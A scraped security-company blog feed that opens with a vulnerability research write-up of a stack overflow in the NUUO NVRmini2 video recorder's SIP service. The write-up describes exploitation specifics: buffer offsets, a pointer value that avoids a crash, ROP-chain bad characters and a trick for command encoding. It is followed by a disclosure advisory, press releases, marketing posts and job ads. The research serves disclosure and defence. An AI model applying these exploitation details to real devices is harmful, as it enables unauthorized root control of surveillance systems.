Analysis of NUUO NVRmini2 Stack Overflow Vulnerability

Blog

Exploiting CVE-2018-19864

– Samuel S., Senior Vulnerability Researcher

During an audit of NUUO’s NVRmini2, a stack overflow vulnerability was discovered in a request handling function in the ‘lite_mv’ custom SIP service binary. The NUUO NVRmini2 runs a custom SIP service on TCP ports 5160 and 5150 via a binary at /NUUO/bin/lite_mv. In order to examine this bug more closely, we analyze the function which handles SIP “NUSP” client requests.

When a client sends a request to the service on TCP port 5150, the ‘lite_mv’ binary calls a read-only relocated function from 0x0008fed8 from a thread.

The function creates 404 bytes of stack buffer for local variables on top of 28 bytes pushed from registers, including the return address from lr.

A call is made to sub_36d40 with arguments “argument_to_function + 188”, “sscanf_source_buffer”, “\r\n”, “2048”. It is assumed that these arguments are, respectively, an offset pointer passed to the calling function, a pointer to the buffer which will be later passed to sscanf, a string representing the bytes to receive up to, and a maximum number of bytes to receive.

This appears to be intended to receive the first line of a SIP request, up to \x0d\x0a, or 2048 bytes.

During dynamic analysis, sending a request totaling more than 2048 bytes did not proceed beyond this execution path. It was also noted that any METHOD field in the request would reach this execution path regardless of its value, as the value is checked later on in the function.

Next, another call is made to sub_36d40, this time replacing the pointer to the buffer that would be passed to sscanf with another offset of the pointer passed to the caller, and a different terminating string.

This appears to be intended to receive the next and final line of a SIP request, consisting of a CSeq header.

It was noted during dynamic analysis that this value could be arbitrary and still reach this execution path, as the value is not checked until later in the function, like the METHOD value above.

Next, the preparation of the arguments to sscanf are particularly interesting. The third argument to sscanf, r2, is a pointer to an offset inside var_1B0_sscanf_3rd_dest_pointer. The fourth argument to sscanf, r3, is set to stack_pointer+8.

This is interesting for two reasons, first, this location appears to be 8 bytes into the buffer used as the source buffer for the call to sscanf. Second, recalling that the function has only allocated 404 bytes on the stack for local variables, we can conclude that a URI value of 351 bytes will overflow the destination buffer, overwriting other local variables.

In pseudo code, this portion of the function might look like the following:

At this point, we can reasonably assume that we can overflow “var_1B0_sscanf_3rd_dest_pointer + 8” with 420 bytes of padding, and overwrite the functions return address with the 421st through 424th bytes and control execution flow. However, since this overflow occurs in beginning of a function with 115 basic blocks, there are some caveats to achieving code execution.

Aside from the ‘lite_mv’ target binary having NX enabled, we recall that the overflow also overwrites the local variables prepared at the beginning of the function.

If we follow the execution flow after the overflow occurs, we can see that, because we deliberately use a value other than “NUSP/1.0” or “NUSP/2.0” for the PROTOCOL value of the request, we follow a branch intended to handle a 500 internal server error response to the client.

Along this branch, we encounter the following instructions, which operate on one of the local variables that were overwritten by sscanf.

Here, the 337th through 340th bytes of our payload have overwritten the value of var_58_sscanf_source_buffer_pointer. This value is decreased by 12 and stored in r4, and compared to 0xffffffff. Since these values are not equal, the branch is taken.

This branch is not taken, and the following instructions are executed.

At this point, a function is called, sub_3366e4, which loads the value at the address stored in “var_58_sscanf_source_buffer_pointer – 4”, wherein a kernel cmpxchg is performed on it, and if the address provided does not point to a string in a writeable memory region, the binary will SEGFAULT before execution flow reaches the terminating block of the function.

In order to bypass this caveat, bytes 337 through 340 must be a little endian, 32-bit integer representing the address of the original value of the local stack variable prior to the offending call to sscanf.

By crafting the payload to include this value, the following execution path is taken, resulting in our controlled return address being popped off the stack back into lr, and branched to.

From here, we can craft a GET request with a PROTOCOL value of anything but “NUSP”, a URI value which includes a leading “/”, 335 bytes of padding, a little endian, 32-bit integer represented as bytes which allows the program to continue execution, 80 bytes of padding, and a rop chain prepared without 0xff, 0x00, or 0x20.

Each portion of the request, as delimited by newline carriage returns, must be fewer than 2048 bytes in length. The second line of the request can consist of any non-bad characters, but must at least end with two sets of newline carriage returns.

Taking the path of least resistance, preparing a rop chain to directly achieve arbitrary command execution, as opposed to preparing a rop chain to bypass NX and directly execute code from the stack, we encounter a caveat in well charted waters; the executed command must not contain any spaces, or the space will be interpreted as the delimiter between the URI and PROTOCOL values. Though there are several ways to bypass this caveat, such as IFS characters or alternate delimiters like tabs, the most flexible solution which the target supported was encoding commands using bracket-expansion.

Note that exploiting this bug, successfully or not, will result in the service crashing and restarting. Continued execution was not explored while analyzing this bug.

Leveraging rop gadgets from shared libraries loaded by ‘lite_mv’, a proof-of-concept which executes arbitrary system commands was prepared, which was delivered to the vendor during the disclosure process.

Root cause

The root cause of this stack overflow is an unsafe use of sscanf, using local stack variables as destination buffers. Because the lengths of strings are not checked against destination buffer sizes prior to the call to sscanf, it is possible to overflow local stack variables and gain control of the return address saved on the stack, and therefore, control of execution flow.

Blog

San Antonio, TX – November 29, 2018 – Digital Defense, Inc., a leading security technology and services provider, today announced that its Vulnerability Research Team (VRT) discovered a previously undisclosed vulnerability in NUUO NVRmini2 Network Video Recorder firmware. NVRmini2 firmware version 3.9.1 and prior is vulnerable to an unauthenticated remote buffer overflow that could potentially be leveraged by an attacker to execute arbitrary code on the system with root privileges. This could allow the attacker to access and/or modify the camera feeds to the NVR and change the configuration or recordings on the NVR.

What You Can Do

Information regarding the security fixes can be obtained through NUUO.

Details of the individual vulnerabilities can be found on the Digital Defense blog.

Tom DeSot, EVP/Chief Information Officer at Digital Defense, said, “NUUO has worked closely with our VRT to ensure a fix is available to organizations utilizing the affected firmware. NUUO’s rapid response to the identification of the issue and collaboration has resulted in a quick resolution.”

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.

NUUO Firmware Disclosure

Blog

NUUO Zero-Day Blog

Digital Defense, Inc. is disclosing a vulnerability identified in NUUO NVRmini2 Network Video Recorder devices discovered by our Vulnerability Research Team (VRT). We commend NUUO for their prompt response to the identified flaws and their engineering team’s work with VRT to provide fixes for these cyber security issues.

Clients who currently use Digital Defense’s Frontline.Cloud platform can sweep for the presence of these issues in Frontline VM by performing a full vulnerability assessment scan or selecting CVC NUUO NVRmini2 ‘lite_mv’ Stack Overflow (126553).

Summary:

Details

Remote, unauthenticated users can execute arbitrary code on the affected system with root privileges.

Application/Version Affected

NUUO NVRmini2 firmware versions 3.9.1 and prior

Details

Sending a crafted GET request to the affected service with a URI length of 351 or greater will trigger the stack overflow. Overflowing of the stack variable, which is intended to hold the request data, results in the overwriting of stored return addresses, and with a properly crafted payload, can be leveraged to achieve arbitrary code execution.

Root Cause

Improper sanitization of user-supplied inputs and lack of length checks on data used in unsafe string operations on local stack variables.

Thanksgiving is almost here, so the guys give thanks to you, their loyal listeners, with some more great channel content.

First up, Mike Kerr of SUSE strolls into the coffeehouse for some chatter about open source and the growing importance it plays in the channel.

Then, Rosanna Pellegrino takes some time away from her day job at Digital Defense to share the latest about her company and offer tips to both partners and customers about preparing for today’s cybersecurity challenges.

Finally, Channel Partners/Channel Futures news editor James Anderson shares his story about the latest technology he’s encountered — a transcription app to help him process his interviews more quickly. Let’s just say it rapidly devolved into what we’re calling “transcription mad libs.”

Click below at the 35 minute marker to hear Rosanna’s portion of the podcast and enjoy!

Digital Defense Announces Frontline Active Threat Sweep™

Blog

San Antonio, TX – November 15, 2018 – Digital Defense, Inc., a leading security technology and services provider, today announced the availability of their next generation Threat Detection technology, Frontline Active Threat Sweep™ (Frontline ATS™), an optional addition to Frontline.Cloud.

Frontline ATS – underpinned by Digital Defense’s patented security assessment technology – operationalizes threat intelligence. The solution fills a unique need in the threat arena by offering an agentless malware detection solution that quickly and reliably analyzes assets across the enterprise for threat activity and indicators of compromise that may have bypassed traditional security defenses.

Time is of the essence when protecting digital assets from cybercriminals. Changing out existing endpoint protection programs in favor of Next Generation Anti-Virus (NGAV) or Endpoint Detection and Response (EDR) offerings requires significant time and investment. Frontline ATS immediately shores-up existing defenses and provides visibility as to where organizations need to selectively deploy tools on endpoints when greater levels of forensic analysis is needed. With Frontline ATS, organizations:

“Whether you need to sweep millions of nodes or just a few, Frontline ATS quickly determines if malware has evaded cybersecurity defenses deployed to protect your information assets,” said Mike Cotton, SVP of Engineering at Digital Defense, Inc. “And as with all Digital Defense solutions, Frontline ATS is a cloud-based offering hosted in Amazon Web Services (AWS). Frontline ATS provides clients with the most powerful and configurable threat sweeping solution in the marketplace”

So, You Cast Your Vote…Or Did You?

Blog

Of late, much has been written regarding the dangers of electronic voting machines and how their security controls are either lacking or non-existent, leading to potential voter fraud or changes in how ballots are cast.

Let’s face it, there’s almost nothing more American than going down to a polling station to cast your ballot for your favorite candidate(s). For those that can still remember, this all used to be done via paper (remember the hanging chad?) but those days are, for the most part, long gone. Paper has since been replaced by electronic machines that allow you to cast your ballot in a quick and efficient pattern. But at what cost?

Many of these machines have been found to be susceptible to tampering either electronically or physically. These vulnerabilities place into question whether votes are being placed or if extra votes are being entered into the system. As a result, there are questions about the accuracy of the vote, and whether or not the person who wins at the polls did so in a legal fashion.

On the surface, some tampering here and there may not seem all that important, but when looked at on a state or national scale, the issue becomes quite troubling. Imagine if a candidate was elected and then it was later discovered that voting machines had been tampered with on a wide scale and that as a result the election had to be called into question. Imagine what that type of event would do to our democracy? And it would only snowball from there. More and more elections would be called into question and there would be turmoil in the entire country. What was real and what wasn’t is what everyone would be asking.

Protecting Yourself

So how do you protect yourself and your vote?

Examples of things you can do include, but are not limited to:

If the machine has a visible seal on it, look at the seal and determine if it looks like it has been tampered with. Has it been peeled back, are the corners frayed, does it show “Void” like it has been removed and put back? If so, these are things that you need to immediately point out to the poll workers so that the machine can be taken out of circulation and you can be assigned a new machine to use to cast your vote.

Does the machine have any wires sticking out of it that seem out of place? Remember, this should be a sealed unit with no wires showing. If so, it’s time to point this out to the poll worker.

Lastly, does the machine exhibit any strange behaviors while you’re using it? Does the screen constantly flicker? Do selections seem to switch or not be assigned properly when you select them? If so, step away from the machine and swiftly notify a poll worker of the irregularities that you’re seeing.

Wait…What About the Voting Websites?

While the voting machine scenarios mentioned above may seem farfetched to some, compromising a website is something that happens every day, even to the largest, most sophisticated companies. If states and the federal government don’t begin to take the security of these websites more seriously, there are likely to be real breaches that impact real elections.

As an example of what could happen if things aren’t taken more seriously, children at Rootz during Def Con were able to compromise facsimile voting sites and list people such as Kim Jong-Un as candidates for public office in a state’s elections, sometimes in a matter of minutes. Now, just imagine if the site had been real.

It may not be a lone hacker that takes these sites down or alters them, but nation state actors, with the means, capability and the capacity to do that very thing through coordinated attacks against state or even federal government sites.

Protecting Yourself

You can protect yourself when using an elections website just like you would when you are using your home banking website. Use strong passwords (if they are required), look for anomalous behavior on the part of the website, and make sure that the data that the site is showing seems accurate and legitimate.

If anything seems off, contact your state or federal elections officials and notify them of the issues that you’re seeing. Remember, while it may be a false alarm, it may not be and you may have been the first person to notice the issues on the site.

Blog

San Antonio, TX – October 23, 2018 – Digital Defense, Inc., a leading security technology and services provider, today announced that its Vulnerability Research Team (VRT) uncovered four previously undisclosed vulnerabilities within the Arcserve Unified Data Protection platform. The vulnerabilities can open the door for potential compromise of sensitive data through access to credentials, phishing attacks and the ability for a hacker to read files without authentication from the hosting system.

Details of the individual vulnerabilities can be found on the Digital Defense blog.

Mike Cotton, Senior Vice President of Engineering at Digital Defense said, “Arcserve has been extremely responsive and collaborative in working with our VRT to resolve the issues. Our mutual goal is to ensure the security of the organizations utilizing the Arcserve systems.”

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.

Arcserve Zero-Day Disclosure

Blog

Digital Defense discloses four previously undisclosed vulnerabilities within the Arcserve Unified Data Protection platform. The vulnerabilities can open the door for potential compromise of sensitive data through access to credentials, phishing attacks and the ability for a hacker to read files without authentication from the hosting system.

Vulnerability Description
Unified Data Protection (UDP) is vulnerable to two unauthenticated information disclosures and an external entity attack that could be utilized by an attacker to gain access to database and other credentials and to read files on the system hosting the UDP application without authentication. Additionally, UDP is vulnerable to reflected cross-site scripting (XSS) which could be utilized for phishing purposes.

Digital Defense has once again joined the list of influential cyber security companies that have been chosen by industry veteran, Dr. Edward Amoroso, CEO of TAG Cyber, to assist with this year’s report. The report has been made available today for free download on the Digital Defense website.

“We are excited to work once again with the TAG Cyber team this upcoming year,” said Larry Hurtado President and CEO of Digital Defense. “Through their steady stream of content they continue to showcase our SaaS security solutions and the cloud-based platforms we have developed to deliver these solutions to organizations around the globe. We truly appreciate how they take the time to clearly understand a solution provider’s technical value propositions and then distill the information into mediums easily consumable by cybersecurity professionals.”

The 2019 TAG Cyber Security Annual is designed in this, TAG Cyber’s third year of publication, to provide direct advisory guidance – at no cost – to the enterprise cyber security professional. Their work is created to help cyber defenders more effectively deal with the technical challenges of our industry. These include integrating cyber analytics across the kill chain, introducing automation to streamline security workflow, and adopting cloud infrastructure for enterprise applications and systems.

“The Digital Defense SaaS platform supporting network vulnerability scanning, penetration testing, and web application scanning from a common portal for comprehensive solution management shows how a successful cyber security company is able to help alleviate the burden of information security,” said Amoroso. “Their security risk assessment solutions are proven successes.”

Each year, TAG Cyber publishes it three-volume report to the community for download at no cost. In addition to the Digital Defense website, the report is also available at https://www.tag-cyber.com/. Volume 2 of the report also includes an informative interview with Digital Defense CTO, Gordon MacKay.

How Vulnerable are your Web Applications? Hackers Know.

Blog

If your organization is like most, web applications are critical to your business. Whether your web apps serve employees, business partners, customers, or likely a combination of all three, they all share a common ‘openness’ attribute. That openness, while invaluable in reaching intended users, is also a presentation layer that hackers systematically penetrate to compromise your back-end systems, extract valuable data, and score intelligence on your business.

In response to this openness conundrum, you do what you can to thwart hackers’ intrusions. Chances are, your best efforts are reactionary as the web applications are seldom static and are changing faster than you can identify, assess, prioritize, and remediate vulnerabilities. Hackers have noted this dynamic, and apply automated techniques to locate application vulnerabilities and launch a progression of exploratory and exploitation steps. You, unfortunately, are under-equipped to effectively battle well-armed hackers.

You need to arm yourself better. But how? Our recommendation is to merge web application scanning into your organization’s security routines; and that calls for a web application scanning platform. But which platform? Following are the Top 5 platform features we recommend you evaluate:

Ease-of-use – Your need is present, so ease-of-use starts with an intuitive means to commence scanning with a few clicks. Even though your apps have been customized, common functionality is typical for applications of the same type (e.g., eCommerce). Platform-included scanning templates by app type will swiftly identify low hanging and frequently exploited vulnerabilities. You can tailor scanning to the uniqueness of your apps later. Also and ultimately, you want scanning to transcend all app stages—development, testing, and production—which means supporting multiple teams of different persuasions. A scanning platform that can ‘speak’ the language of each team assists in the long run.

Relevant and actionable scans – An auto repair shop will inevitably find something to repair; the same with vulnerability scanning. What you want to know is which vulnerabilities are critical from the combined perspective of: severity if exploited, pervasiveness, and likelihood of being exploited. Lacking prioritization from the platform, that task falls on your shoulders. You also want ‘plain English’ vulnerability details: why a priority, where they exist, and remediation options. Drilling down for additional technical details is good, but on an ‘as needed basis’ is fine. False positives also compete for your valuable time. If those false positives are the result of suboptimal triangulation of scanning results and context, consider another platform.

Expert concierge service included – Indisputably, cybersecurity is complex. While an effective scanning platform will reliably complete the heavy lifting, it cannot paper over all complexity. On-call web application vulnerability experts familiar with your environment are an outsourced resource you will need periodically, but without the full-time expense.

Reasonable pricing – Your primary objective is to improve the security of your web applications. Scanning to identify conditions that make web apps less secure is the means. With reasonable pricing, the cost of scanning should not discourage you from pursuing your primary objective. You need flexibility to increase scanning frequency without a cost disincentive.

Ecosystem ready – Good cybersecurity practices require cross-technology collaboration. Your web application scans should be combinable with scans of the server infrastructure to produce a full picture of vulnerability risk (from the application down through the hosting infrastructure). Also, the scanning platform should interoperate with prevention technologies (e.g., web application firewalls) when vulnerability fixes are impractical.

The openness of web applications should not equate to security risk. But it will if you are not proactive in identifying and resolving your application vulnerabilities. Inescapably, a web application scanning platform is essential—but choose wisely as you will depend on this platform extensively.

How Alliances Strengthen Your Cybersecurity Defenses

Digital Defense, Inc.

Reduce Risk by Integrating Vulnerability Management with Network Access Control

What technology allows you to detect when a device such as a laptop, a printer or other, comes on the network, can block that device from accessing the network and may even isolate the device to certain parts of the network? The answer is Network Access Control technology or NAC. More and more organizations are using NAC to manage and monitor network access. But what if I told you, you can super power your NAC and significantly reduce your enterprise security risk by simply adding a touch of “vulnerability intelligence” to the mix? Interested? Read on!

An integration of a vulnerability management system and a NAC allows the NAC to implement security policies for devices wanting access to the network, dependent upon the vulnerability information for the devices, such as vulnerability severity, types of vulnerabilities, vulnerability age (how long has it been present and un-remediated), and much more. Take a look at the following figure which illustrates this integration concept at a high level.On its own, the NAC may monitor and deny network access to any device based on information it knows about. The Vulnerability Management and scanning solution may periodically assess devices for their weaknesses (vulnerabilities and configuration issues). Together though, the NAC may use the vulnerability information as part of its access decision policies.

Examples of security policies achieved with such an integration are:

The above are just simple examples of how to power the NAC with a Vulnerability Management solution and its scan intelligence data. Giving the NAC this information allows it to take more granular action and thereby reduce your overall security risk.

“Information Security professionals are increasingly tasked with the installation and management of multiple security technologies to optimally defend against the constant threats that could potentially expose their organization,” said Rosanna Pellegrino, SVP, sales and business development, Digital Defense. “The challenge becomes the resource allocation and expertise required to effectively manage varying systems. Digital Defense and McAfee address a rising industry need to shorten response times from security events and more easily remediate compromised systems.”

The integrated Frontline VM and McAfee ePO solution eases the burdens associated with running multiple systems and simplifies the process of vulnerability and threat management. Common customers benefit from:

Accurate and comprehensive host identification capability

Policy orchestration that automates deployment of agents to unmanaged systems immediately upon detection

As a member of the McAfee Security Innovation Alliance, Digital Defense, Inc. plays a critical role in the program’s mission to accelerate the development of interoperable security products and to simplify the integration of these products within complex customer environments, bringing better value and more protection against the growing threat landscape to joint customers.

“By implementing products that are compatible with McAfee security solutions, our common customers experience faster deployment times and reduced costs,” said D.J. Long, vice president, strategic business development at McAfee. “Security should be easy to manage, so McAfee has taken the steps needed to open up its security risk management architecture and provide customers with the tools to easily manage their multi-vendor security environments. The result is greater protection, reduced risk and increased compliance.”

2018 PCI Community Meeting | Booth#21

Digital Defense, Inc.

When: August 25-27, 2018

Where: The Mirage, Las Vegas, NV

Visit Digital Defense at booth #21 to learn more about our unique approach to PCI Scanning.

Digital Defense was the first vendor to provide a PCI compliance manager service, and remains one of the world’s longest tenured PCI Approved Scanning Vendors (PCI ASV). As an ASV for 13 years running, we have more PCI compliance guidance experience than 90% of the industry’s ASVs.

Blog

Provides Organizations with Accurate and Complete Visualization of Network Risks

SAN ANTONIO, TX– July 17, 2018 – Digital Defense, Inc., an industry recognized provider of security assessment solutions, today announced the integration of their proprietary platform, Frontline Vulnerability Manager (Frontline VM™), with ForeScout Technologies, Inc. CounterACT®. As a member of the ForeScout Technology Partner Program, Digital Defense will work with ForeScout to enable real-time assessment, host analysis and policy-based mitigation of endpoint security risks.

“We are pleased to partner with Digital Defense and offer our joint customers a leading integrated security solution that reduces risk and helps to keep threats out,” said Amy De Salvatore, VP, global strategic alliances, ForeScout Technologies. “Together, we are delivering highly accurate network assessments and intelligent automation of workflow processes and policies.”

The integration will provide joint customers with:

Continuous visibility of connected devices

Prompt response to block or quarantine endpoints with critical vulnerabilities

Automated remediation actions

Ability to provide on-demand scans based on ForeScout CounterACT policies

“The Frontline VM integration with ForeScout CounterACT streamlines remediation efforts and improves organizational processes and efficiencies by automating the workflow process of identifying hosts, scanning for known vulnerabilities and risk of hosts,” said Rosanna Pellegrino, SVP, sales and business development, Digital Defense. “The assimilation of data through the two platforms bolsters security with real-time visibility of managed and unmanaged devices.”

2018 Black Hat USA | Booth #L29

Digital Defense, Inc.

When: August 7-10, 2018

Where: Mandalay Bay Convention Center, Las Vegas, NV

Digital Defense, Inc. is excited to announce that we are a Silver Sponsor at Black Hat USA 2018. We invite you to visit us August 8th & 9th in the Business Hall, booth #L29 to learn more about our exciting technology integrations with Frontline VM™, our industry recognized Security assessment platform now residing in the Amazon Web Services (AWS) cloud.

Security Within The Cloud | Digital Defense, Inc.

Blog

Adoption of Infrastructure as a Service (IaaS) continues at a rapid pace. According to Frost & Sullivan’s 2018 cloud user survey, over 55% of the survey respondents state they currently use IaaS and another 22% will within two years. Yet, security within the cloud remains a top-of-mind concern and is a principal reason why cloud-deployed workloads are repatriated to enterprise-managed environments.

How then should organizations gain the advantages of IaaS without increasing their security risk? Although simple to say “take your current security technologies with you,” the reality is that a “lift and shift” approach may miss the mark as your current security technologies may not be “cloud friendly.” Rather, we believe a stronger approach is to choose your familiar security technologies that are designed as cloud-friendly and hosted in the same cloud as your workloads.

Let’s take vulnerability scanning as an example. With speed and scalability being driving factors in IaaS adoption, injecting vulnerability scanning into existing and future workloads must have a snap-on, frictionless attribute. Just a few intuitive clicks within build and deploy can make the difference between workloads verified free of known vulnerabilities versus those that are exposed. Explaining why a compromise occurred because of a known vulnerability is never a pleasant conversation.

Workload visibility is also essential. Workloads cannot be protected if their existence is unknown. For this reason, vulnerability scanning must have direct visibility into the account structure that the cloud provider has for its IaaS customers. Again, a “didn’t know that was our workload” is not a pleasant conversation.

Back to speed, vulnerability scanning should operate on cloud time. Reaching into cloud workloads from the outside not only adds latency, it incrementally adds bandwidth cost. Follow the good neighbor policy and eliminate that friction by choosing vulnerability scanning that happens within the same cloud platform as your workloads.

Finally, it’s a global economy. Whether now or later, your reach will cross geographic boarders. All major cloud providers have global reach with regional and local segmentation. Vulnerability scanning integrated with the cloud provider inherits global reach with the segmentation needed to comply with data sovereignty and locality regulations.

Whether your organization is already using IaaS or making the move, security should not be an afterthought. Built-in rather than bolt-on has proven to be the better approach. But building in does not mean compromises on how you want the cloud to work for you and protect your valuable assets. Our advice, choose cloud security services that have cloud-friendly attributes built in.

GDPR Playbook

Blog

It’s time to play hardball – Fight and win the GDPR battle with a leader, plan and rock star team.

Yes. We know GDPR is here. Can we talk about something else now?

Nope, not if you haven’t done all your due diligence to implement best practices and comply. Ignorance has been bliss but it’s not an excuse post May 25, 2018.

We’ve already seen GDPR come down with hard on day 1 of its enforcement with Google, Facebook, Instagram and WhatsApp with fines that could carry $9.3 billion. It’s easy to think if you’re a “mostly” U.S. focused company or if you’re small or medium in size that GDPR isn’t something you need to concern yourself with. The ugly truth is that is far from the case.

If you’re like the majority of companies, GDPR compliance is definitely still a dilemma even though the deadline has come and gone.

Why?

It’s a regulation and not a straight forward security framework to follow so there’s a lot of guesswork;

There are significant hurdles in pivoting operations towards new business practices to comply;

Data discovery to find PII, where it is and where it isn’t, is challenging within all systems but especially legacy systems; and

You only have 72 hours to report a breach, which means there isn’t much time for investigation or validation, just to name a few.

Don’t assume or it makes an…

The deadline might have passed but the majority of companies aren’t fully ready. Don’t fool yourself into thinking that because you are compliant with other regulations like PCI DSS or HIPAA you will fall into GDPR compliance fully or easily.

You need to do an internal audit to determine your readiness to comply and build a team of winners to help you conquer. Ask yourself:

What data security safeguards do you have in place currently and how do they align with GDPR requirements?

What standards or regulations are you already compliant with, and where are the gaps between those and the GDPR?

What GDPR supervising authorities should be on your radar based on your business or industry?

Who are your key internal rock stars to help you on your way to GDPR compliance?

How should you organize internally to audit your security practices and controls and then elect if they will be sufficient to comply?

Starting there will put you ahead of most at this stage, and having a plan in place can help reduce the chaos that can ensue from ignorance around this complex subject.

Every winning team needs the best players

You need a playbook. Top college football teams didn’t become national champions by shooting from the hip. At the core, they started with a leader who built a team to win. Finding the right skillset for your team is what’s key.

Creating a strong underpinning of security and compliance involves surrounding your organization with a veracious team of people:

An executive, powerhouse player –The tone from the top is key for GDPR compliance and security operations of any kind. An engaged and involved executive doesn’t have to be an expert in security or even IT, but they should comprehend the goals and initiatives and have visibility into all security-related technologies, policies and processes. A good place to start would be your Chief Legal Officer, as they have a big stake in ensuring organizational adherence to GDPR.

This player can be your advocate and watch your back as the rest of your team focuses on executing and getting the job done.

A cybersecurity quarterback – Someone who is willing to lead the team during both the research and implementation process. It’s important that this person is included from the beginning. This person might hold the job title of CISO or ISO and is very focused on bringing departments together to avoid gaps in security and compliance due to silos within the organization.

A compliance or data privacy guru – Someone within your organization that understands GDPR and all other regulations that need to be met with any technology platform you put in place. This is actually a required position in GDPR known as the Data Privacy Officer (DPO) but they might currently hold the title of Compliance Officer or the like. This person has vast knowledge to bring to the table so be sure to stay unbiased and truly take their input under serious advisement.

A security operations watchdog –This is the person that works in-depth within your IT infrastructure to ensure no one is sneaking in through your backdoors. This is the person that is often missing internally from the small to mid-sized business due to lack of budget or scarcity of the market supply.

The referee – This member is the one who loves putting processes into place. They are your stream-liners! It’s often someone with administrative duties who knows the ins and outs of your business. This person’s perspective will help you identify gaps that you might not otherwise be aware of if this skill just isn’t in your remit.

The all-star – It’s ok to ask for directions. With your 5 internal team players being in place, it’s time to consider outside help. With GDPR being complex, bringing in an expert in can really help you win the game faster. Because GDPR is so new, this person might not have many GDPR “wins” under their belt just yet, but if they do snatch them up! They likely do have compliance and security accolades and significant experience that can help your organization take their GDPR compliance plan to the next level.

Complying with any regulation is difficult but if you keep your wits about you when others are in a panic, it’s probable you’ll come out smelling like roses. Your team is looking for you to lead so create the plays and go for the win.

The Catch-22 of Web Application Innovation

Blog

History or Mystery?

As we look back at the first half of 2018, many of the cyber threat predictions have already come to pass around lack of GDPR compliance, increasing breaches on IoT devices and web apps, more DDoS attacks, etc. The attacks on the web applications like that of MyFitnessPal, TaskRabbit, and Pizza Hut are just the beginning of what’s to come for web application threats.

With breaches hammering the headlines daily, it’s easy to identify a trend: Hacking is a lucrative business and it’s not going anywhere. Savvy business leaders are struggling to keep up with technology, outsourcing, and moving services to IaaS platforms, with less ‘direct’ contact to their assets. Securing and protecting the sensitive data held on those systems is ever more critical to maintaining a strong security posture.

According to the recent Verizon Data Breach Investigation Report, “we saw, yet again, that cybercriminals are still finding success with the same tried and tested techniques, and their victims are still making the same mistakes.” The report also showed that web application attacks led the way as the most common breach pattern. It seems history is intent on repeating itself. However it has also become more evident that new flavors of ransomware and botnets like Mirai will continue to invade infrastructures as attackers work to refine their craft.

The Catch-22 of Web Apps.

As organizations try to remain agile and innovative, the pressure of speed to market, staying agile, and remaining relevant are just some ‘Catch-22s’ and harsh realities for a modern business. Sure, the benefits of web applications are undeniable, but application development, bypassing stringent code review, testing, and default creds are just some of the struggles that can inhibit innovation or open up more holes for hackers to exploit.

“There’s an App for That.”

We haven’t heard that in a while! Even app stores and apps for phones and tablets pose a significate risk and benefit for organizations. ‘We’ want an app for everything and app developers are scrambling to put in new features and functionality to stay in the game. The more apps we have the more potential attack surfaces and vectors exist and we have to prepare for them to be exploited. It can be a vicious cycle.

Hacks byway of web applications have steadily been on the rise, likely due in part to the growing adoption by organizations around the Internet of things (IoT), of which many have web interfaces, and mobile device adoption. According to a recent 2018 Symantec report, the “Internet of Things (IoT) attacks increased 600% between 2016 and 2017.” It’s just simple math, right? The more web interfaces there are, the more you need to scan them for vulnerabilities to protect them to avoid cyber incidents such as DDoS attacks. But the truth is the math is the only simple thing about it or we wouldn’t all be scrambling to stay ahead of these threats.

The Cart Before the Horse?

As hackers succeed and fail, the more knowledge they gain and the faster we have to work to try to head them off at the pass. Putting a Web Application Firewall (WAF) in place to protect your web applications isn’t enough anymore. History has proven that we are seeing more variations of attack vectors, and consequently an organization needs to proactively prepare for the inevitable attack by scanning for weaknesses.

If you’re thinking you’ve put the cart before the horse by moving to the cloud but are just now realizing what needs to be done for web application security, you probably did. The good news is that you’re not alone, and it isn’t too late to put safeguards in place to protect the application layer of your key assets, while still reaping the rewards of innovative web applications.

It’s Not Too Late to Automate.

There are best practices to protect your web applications and solutions to help you get quick wins by leveraging key technologies such as Digital Defense’s Frontline WAS™. Our solution has been developed to provide the highest level of dynamic web application testing results through a system that is easily deployed and maintained. A Web Application Scanner can help your prioritization of the most critical vulnerabilities, saving you valuable resources through targeted remediation efforts.

As we continue through the second half of 2018, perhaps we can learn from historical data around vulnerabilities and breaches to unravel the cybercrime mystery that is no doubt never-ending. We may not be able to get ahead of all threats, but learning from the past is the best way to prepare for the future.

Mid-level Software Test Engineer in Research & Development

Careers

If you are passionate about quality software, if you have an interest in software security, and if you want to work with a team testing award-winning security scanning technology, Digital Defense, Inc. has an immediate opening for a Mid-level Software Test Engineer. Helping to test our next generation security technology platform, ideal candidates should have prior experience testing complex web applications, with experience testing security and/or cloud applications a major plus. Candidates will be expected work closely with the test engineering team and contribute to testing a of large web application product and its various components.

Daily tasks may include:

Running manual and automated tests against pre-release versions of a complex web application

Documenting bugs and assisting in root-cause determination of issues

Working closely with developers to understand and test new features and code

Writing test cases and test strategy documentation for new features

Monitoring and reproducing customer reported issues

Validating bug fixes

Participating in and contributing to sprint planning meetings

Digital Defense is a profitable, privately held network security company with solid-growth, a great team-oriented culture and flexible work environment. We offer stock-options, 401k, health insurance and other standard benefits.

The candidate must live in or be willing to relocate to the San Antonio, TX, area.

Skills / Requirements:

Must be eligible to work in the U.S. without sponsorship

2+ years of experience testing production software, manual and automated testing

API Integration Development Engineer

Careers

Digital Defense has an immediate opening for a Software Developer to work in our Office of the CTO team, helping to research and implement 3rd party integrations to our Frontline Vulnerability Management platform. Candidates must have prior experience working on REST APIs, as well as two or more programming languages, including Python or PERL, we well as one other language.

You will learn about Vulnerability Management, as well as many other security technologies, including SIEM, NAC, GRC, IPS, and many more.

Digital Defense is a profitable, privately held network security company with solid-growth, a great team-oriented culture and flexible work environment. We offer stock-options, 401k, health insurance and other standard benefits.

The candidate must live in or be willing to relocate to the San Antonio, TX, area.

Skills / Requirements:

Highly proficient in at least one major scripting language Python, Ruby or Perl.

Experience with at least one other programming language

Experience with Web applications and REST APIs.

Experience working with the Linux operating system.

Experience working with SQL databases such as Postgres or MySQL.

Good understanding of web network protocols such as HTTP, JSON, XML-RPC, SSL and REST API interaction.

